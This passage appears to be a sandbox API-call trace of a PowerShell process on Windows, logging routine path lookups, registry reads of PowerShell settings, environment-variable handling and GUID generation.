lpBuffer="༨ݡḘހ㊴畮㊤畮\x0e") returned 0x0 [0186.513] CoTaskMemFree (pv=0x31fd1b0) [0186.635] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0186.652] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0186.652] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0186.653] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0186.654] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0186.654] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0186.654] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0186.654] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0186.654] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0186.654] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0186.654] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0186.654] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0186.655] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0186.655] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0186.655] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0186.765] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0186.876] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x54ba46c*="Available", lpRawData=0x54ba394) returned 1 [0186.890] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0186.891] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x31fd1b0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0186.891] CoTaskMemFree (pv=0x31fd1b0) [0186.892] GetCurrentProcessId () returned 0x1064 [0186.894] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae660 | out: phkResult=0xdae660*=0x67c) returned 0x0 [0186.895] RegQueryValueExW (in: hKey=0x67c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae680, lpData=0x0, lpcbData=0xdae67c*=0x0 | out: lpType=0xdae680*=0x1, lpData=0x0, lpcbData=0xdae67c*=0x56) returned 0x0 [0186.895] RegQueryValueExW (in: hKey=0x67c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae680, lpData=0x54c10ec, lpcbData=0xdae67c*=0x56 | out: lpType=0xdae680*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdae67c*=0x56) returned 0x0 [0186.895] RegCloseKey (hKey=0x67c) returned 0x0 [0187.026] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x323c478 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0187.028] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0187.028] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0187.029] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0187.029] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0187.029] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0187.029] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0187.029] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0187.029] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0187.030] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0187.030] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0187.030] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0187.030] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0187.030] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0187.030] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0187.030] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0187.032] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0187.090] CoCreateGuid (in: pguid=0xdae5e4 | out: pguid=0xdae5e4*(Data1=0xd349c2d4, Data2=0xa9af, Data3=0x47a4, Data4=([0]=0x85, [1]=0xa9, [2]=0x79, [3]=0x1e, [4]=0x1, [5]=0x17, [6]=0xfc, [7]=0xdf))) returned 0x0 [0187.136] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x67c [0187.136] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x690 [0187.136] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x698 [0187.136] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x694 [0187.137] SetEvent (hEvent=0x694) returned 1 [0187.137] SetEvent (hEvent=0x67c) returned 1 [0187.137] SetEvent (hEvent=0x690) returned 1 [0187.137] SetEvent (hEvent=0x698) returned 1 [0187.143] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x69c [0187.144] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae35c | out: phkResult=0xdae35c*=0x6a0) returned 0x0 [0187.145] RegQueryValueExW (in: hKey=0x6a0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xdae37c, lpData=0x0, lpcbData=0xdae378*=0x0 | out: lpType=0xdae37c*=0x0, lpData=0x0, lpcbData=0xdae378*=0x0) returned 0x2 [0187.146] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6a4 [0187.148] SetEvent (hEvent=0x6a4) returned 1 [0196.789] CoCreateGuid (in: pguid=0xdae7ac | out: pguid=0xdae7ac*(Data1=0xc66114cc, Data2=0x5164, Data3=0x4577, Data4=([0]=0x98, [1]=0xf1, [2]=0x22, [3]=0x68, [4]=0x49, [5]=0x4d, [6]=0x26, [7]=0xbd))) returned 0x0 [0196.876] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdae7dc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdae7dc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x4f, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0196.876] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0196.876] GetEnvironmentVariableW (in: lpName="PathEXT", lpBuffer=0x31fd1b0, nSize=0x104 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0196.876] CoTaskMemFree (pv=0x31fd1b0) [0196.877] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0196.877] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x31fd1b0, nSize=0x104 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc2 [0196.877] CoTaskMemFree (pv=0x31fd1b0) [0196.878] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdae53c, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\PÚ眔") returned 0xc3 [0196.878] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdae47c, nSize=0xc3 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc3 [0196.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae618 | out: phkResult=0xdae618*=0x7cc) returned 0x0 [0196.880] RegQueryValueExW (in: hKey=0x7cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdae634, lpData=0x0, lpcbData=0xdae630*=0x0 | out: lpType=0xdae634*=0x2, lpData=0x0, lpcbData=0xdae630*=0xbc) returned 0x0 [0196.880] RegQueryValueExW (in: hKey=0x7cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdae634, lpData=0x55a8be0, lpcbData=0xdae630*=0xbc | out: lpType=0xdae634*=0x2, lpData="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpcbData=0xdae630*=0xbc) returned 0x0 [0196.880] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%", lpDst=0xdae498, nSize=0x64 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0196.880] ExpandEnvironmentStringsW (in: lpSrc="%\\WindowsPowerShell\\Modules;%", lpDst=0xdae498, nSize=0x64 | out: lpDst="%\\WindowsPowerShell\\Modules;%") returned 0x1e [0196.880] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0xdae498, nSize=0x64 | out: lpDst="C:\\WINDOWS") returned 0xb [0196.880] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdae498, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0196.880] RegCloseKey (hKey=0x7cc) returned 0x0 [0196.880] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdae53c, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0196.881] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae618 | out: phkResult=0xdae618*=0x7cc) returned 0x0 [0196.882] RegQueryValueExW (in: hKey=0x7cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdae634, lpData=0x0, lpcbData=0xdae630*=0x0 | out: lpType=0xdae634*=0x0, lpData=0x0, lpcbData=0xdae630*=0x0) returned 0x2 [0196.882] RegCloseKey (hKey=0x7cc) returned 0x0 [0196.900] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0196.900] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x31fd1b0 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0196.900] CoTaskMemFree (pv=0x31fd1b0) [0196.900] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0196.900] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0196.900] ExpandEnvironmentStringsW (in: lpSrc="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpDst=0xdae520, nSize=0x64 | out: lpDst="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules") returned 0x33 [0196.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0196.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0xdae614, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64Process\x9erVó&õðù¡s\x1cíÚ", lpUsedDefaultChar=0x0) returned 14 [0196.904] GetProcAddress (hModule=0x772d0000, lpProcName="IsWow64Process") returned 0x772e5a20 [0196.904] GetCurrentProcess () returned 0xffffffff [0196.904] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0xdae674 | out: Wow64Process=0xdae674) returned 1 [0196.904] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0196.904] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x31fd1b0 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0196.905] CoTaskMemFree (pv=0x31fd1b0) [0196.905] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0196.905] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0196.905] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 1 [0197.025] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdadf08 | out: phkResult=0xdadf08*=0x7cc) returned 0x0 [0197.030] RegQueryValueExW (in: hKey=0x7cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdadf28, lpData=0x0, lpcbData=0xdadf24*=0x0 | out: lpType=0xdadf28*=0x1, lpData=0x0, lpcbData=0xdadf24*=0x56) returned 0x0 [0197.030] RegQueryValueExW (in: hKey=0x7cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdadf28, lpData=0x55b1238, lpcbData=0xdadf24*=0x56 | out: lpType=0xdadf28*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdadf24*=0x56) returned 0x0 [0197.030] RegCloseKey (hKey=0x7cc) returned 0x0 [0197.031] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xc1cc4cee, Data2=0x578a, Data3=0x4529, Data4=([0]=0xb0, [1]=0xf3, [2]=0xf7, [3]=0x69, [4]=0xe8, [5]=0xfa, [6]=0x41, [7]=0x56))) returned 0x0 [0197.031] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x7e939c3a, Data2=0x77c4, Data3=0x45b4, Data4=([0]=0xae, [1]=0xf0, [2]=0x56, [3]=0xcf, [4]=0x1c, [5]=0x5a, [6]=0xad, [7]=0x80))) returned 0x0 [0197.032] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xbeacf80c, Data2=0x9af2, Data3=0x463f, Data4=([0]=0xb6, [1]=0xd8, [2]=0xb0, [3]=0xa0, [4]=0xf8, [5]=0x68, [6]=0x6d, [7]=0xe9))) returned 0x0 [0197.032] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x6d04c072, Data2=0xf46b, Data3=0x4a8e, Data4=([0]=0xbc, [1]=0x9b, [2]=0x40, [3]=0xe0, [4]=0xc4, [5]=0xc2, [6]=0xd0, [7]=0x70))) returned 0x0 [0197.032] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x394c1631, Data2=0xef48, Data3=0x44ee, Data4=([0]=0xbd, [1]=0x3c, [2]=0x8b, [3]=0x97, [4]=0x9, [5]=0x13, [6]=0xc9, [7]=0x60))) returned 0x0 [0197.032] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xc91fc727, Data2=0xb8c5, Data3=0x4bb2, Data4=([0]=0x96, [1]=0x8c, [2]=0x61, [3]=0x17, [4]=0xfd, [5]=0xe3, [6]=0x6d, [7]=0xa5))) returned 0x0 [0197.032] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x3bf63373, Data2=0x4f5b, Data3=0x49e3, Data4=([0]=0xb3, [1]=0xb2, [2]=0xa8, [3]=0xe3, [4]=0x1b, [5]=0xc8, [6]=0x66, [7]=0xb4))) returned 0x0 [0197.032] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x22f8f00c, Data2=0x9944, Data3=0x4e1c, Data4=([0]=0x83, [1]=0xcb, [2]=0x2f, [3]=0xfd, [4]=0xe6, [5]=0x6d, [6]=0xfa, [7]=0x11))) returned 0x0 [0197.033] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x51149be5, Data2=0x7902, Data3=0x4229, Data4=([0]=0xb6, [1]=0xfc, [2]=0x42, [3]=0xc4, [4]=0xda, [5]=0xa, [6]=0x64, [7]=0xbd))) returned 0x0 [0197.033] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xdf733c58, Data2=0x49ee, Data3=0x4898, Data4=([0]=0x9e, [1]=0x1b, [2]=0xd2, [3]=0x72, [4]=0xbd, [5]=0x1c, [6]=0x5d, [7]=0x1f))) returned 0x0 [0197.033] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x91bddd07, Data2=0x72e3, Data3=0x493f, Data4=([0]=0xb5, [1]=0xaa, [2]=0x23, [3]=0x6b, [4]=0x8d, [5]=0xdd, [6]=0xb1, [7]=0x32))) returned 0x0 [0197.033] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x357cf3f1, Data2=0xa35f, Data3=0x4916, Data4=([0]=0x81, [1]=0xa2, [2]=0xd5, [3]=0x7f, [4]=0xdd, [5]=0x78, [6]=0xbd, [7]=0xb8))) returned 0x0 [0197.033] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x28ff2434, Data2=0xa1e1, Data3=0x4c79, Data4=([0]=0xa8, [1]=0x28, [2]=0xf1, [3]=0x2e, [4]=0x77, [5]=0x8a, [6]=0x1d, [7]=0xa5))) returned 0x0 [0197.033] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x502a5ad9, Data2=0x8987, Data3=0x4dae, Data4=([0]=0x83, [1]=0xa7, [2]=0xbd, [3]=0xc7, [4]=0x52, [5]=0x1c, [6]=0x45, [7]=0x70))) returned 0x0 [0197.033] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xaf2e3ea7, Data2=0xb8df, Data3=0x4c7a, Data4=([0]=0x88, [1]=0x97, [2]=0x9a, [3]=0x4b, [4]=0xb8, [5]=0xd4, [6]=0x59, [7]=0x12))) returned 0x0 [0197.034] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xa30c57bb, Data2=0x44bf, Data3=0x42f7, Data4=([0]=0xa2, [1]=0x7, [2]=0xdf, [3]=0x22, [4]=0x63, [5]=0x84, [6]=0xb3, [7]=0xe0))) returned 0x0 [0197.034] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x31db0da5, Data2=0xbe17, Data3=0x43f8, Data4=([0]=0xb1, [1]=0xf6, [2]=0x23, [3]=0x8d, [4]=0x16, [5]=0x7, [6]=0x37, [7]=0x79))) returned 0x0 [0197.034] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xb9d9286a, Data2=0xef85, Data3=0x4506, Data4=([0]=0x8d, [1]=0xa0, [2]=0xfb, [3]=0xbe, [4]=0xf2, [5]=0x93, [6]=0x6f, [7]=0x8c))) returned 0x0 [0197.034] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x9243b23b, Data2=0xf681, Data3=0x4acd, Data4=([0]=0x84, [1]=0x5b, [2]=0xed, [3]=0xfc, [4]=0x6, [5]=0xd, [6]=0xb, [7]=0xc0))) returned 0x0 [0197.035] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xf054b80d, Data2=0x87c2, Data3=0x49e8, Data4=([0]=0x92, [1]=0x31, [2]=0x39, [3]=0x4e, [4]=0x20, [5]=0x44, [6]=0x96, [7]=0xf5))) returned 0x0 [0197.035] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x534a3c27, Data2=0xd8c4, Data3=0x458a, Data4=([0]=0xb8, [1]=0x4, [2]=0x3, [3]=0x3c, [4]=0x5c, [5]=0x92, [6]=0xc4, [7]=0xb1))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x4e76161a, Data2=0x18ab, Data3=0x4f27, Data4=([0]=0xb9, [1]=0x23, [2]=0xc7, [3]=0x96, [4]=0x8f, [5]=0x13, [6]=0x89, [7]=0x28))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x6341e514, Data2=0xa7ce, Data3=0x4ed0, Data4=([0]=0xad, [1]=0x27, [2]=0x25, [3]=0xd6, [4]=0xb2, [5]=0xc6, [6]=0x84, [7]=0x7c))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x7d4a90a3, Data2=0x47b5, Data3=0x46f4, Data4=([0]=0x90, [1]=0xf4, [2]=0x7e, [3]=0x6a, [4]=0xee, [5]=0x84, [6]=0xdd, [7]=0x1c))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x7c1ad319, Data2=0xb2e4, Data3=0x45a7, Data4=([0]=0xbe, [1]=0x3c, [2]=0x9c, [3]=0xdd, [4]=0xc9, [5]=0x2e, [6]=0x8e, [7]=0x13))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x40767b55, Data2=0xd8f7, Data3=0x4f1b, Data4=([0]=0xb1, [1]=0xff, [2]=0x97, [3]=0x92, [4]=0xef, [5]=0x47, [6]=0x18, [7]=0xfd))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xbaf1ed57, Data2=0x8256, Data3=0x452e, Data4=([0]=0xa2, [1]=0x66, [2]=0x6d, [3]=0xdc, [4]=0x92, [5]=0x46, [6]=0x6c, [7]=0xbc))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x177fe4e5, Data2=0x782c, Data3=0x4ed7, Data4=([0]=0x9e, [1]=0x53, [2]=0xe8, [3]=0x38, [4]=0x10, [5]=0x62, [6]=0x2c, [7]=0xfe))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x2b8272f5, Data2=0x6739, Data3=0x4862, Data4=([0]=0xb7, [1]=0xbd, [2]=0x86, [3]=0x19, [4]=0xa2, [5]=0x1e, [6]=0x54, [7]=0xd4))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x31e58877, Data2=0x4a0c, Data3=0x4291, Data4=([0]=0xb2, [1]=0x88, [2]=0x45, [3]=0x87, [4]=0xd6, [5]=0xf0, [6]=0x55, [7]=0x7e))) returned 0x0 [0197.036] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x715c2079, Data2=0x3c09, Data3=0x47eb, Data4=([0]=0x8a, [1]=0x14, [2]=0x41, [3]=0xc0, [4]=0x42, [5]=0x45, [6]=0xe7, [7]=0x6d))) returned 0x0 [0197.037] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xe7d56441, Data2=0xda77, Data3=0x4dc6, Data4=([0]=0x93, [1]=0xec, [2]=0xb8, [3]=0x49, [4]=0xfa, [5]=0x61, [6]=0xac, [7]=0x50))) returned 0x0 [0197.037] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x6f8b21e8, Data2=0x2ce4, Data3=0x4c08, Data4=([0]=0xb2, [1]=0x5, [2]=0xf2, [3]=0x59, [4]=0x3b, [5]=0x67, [6]=0x5c, [7]=0x62))) returned 0x0 [0197.037] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xf294f986, Data2=0xcd69, Data3=0x4d56, Data4=([0]=0xaf, [1]=0x68, [2]=0x8a, [3]=0xca, [4]=0x99, [5]=0x30, [6]=0xa2, [7]=0x9f))) returned 0x0 [0197.051] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x172a6087, Data2=0x310c, Data3=0x4f5e, Data4=([0]=0x87, [1]=0x28, [2]=0xeb, [3]=0xfa, [4]=0xb6, [5]=0xa9, [6]=0xe0, [7]=0x98))) returned 0x0 